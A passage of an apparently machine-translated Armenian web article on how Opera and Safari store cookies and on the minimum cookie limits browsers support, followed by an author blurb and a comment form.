  • Opera պահպանում է իր բոլոր թխուկները մեկ ֆայլում և կոդավորում է դրանք (անհնար է դրանք փոփոխել, բացառությամբ ծրագրային ընտրանքների);
  • Apple Safari- ն պահպանում է իր բոլոր թխուկները մեկ .plist ընդլայնման ֆայլում: Փոփոխությունը հնարավոր է, բայց ոչ շատ հեշտ, եթե չանցնեք ծրագրային տարբերակների միջով:

Բրաուզերները պետք է աջակցեն նվազագույն :

  • 300 միաժամանակյա թխուկներ;
  • 4 o մեկ թխուկի համար;
  • 20 թխուկներ մեկ հոսթի կամ տիրույթի համար:
[Ընդհանուր: 0 Նշանակում է: 0]

Գրված է Վերանայում է խմբագիրներին

Փորձագետ խմբագիրների թիմն իր ժամանակն անցկացնում է արտադրանքի ուսումնասիրության, պրակտիկ թեստերի կատարման, ոլորտի մասնագետների հետ հարցազրույցի, սպառողների ակնարկների վերանայման և մեր բոլոր արդյունքների մասին գրելու համար ՝ որպես հասկանալի և համապարփակ ամփոփագրեր:

Թողնել մեկնաբանություն

Ձեր էլ. Փոստի հասցեն չի հրապարակվի: Պահանջվող դաշտերը նշված են աստղանիշով *

Ինչ եք կարծում?

384 Միավորները
Վերեւում Downvote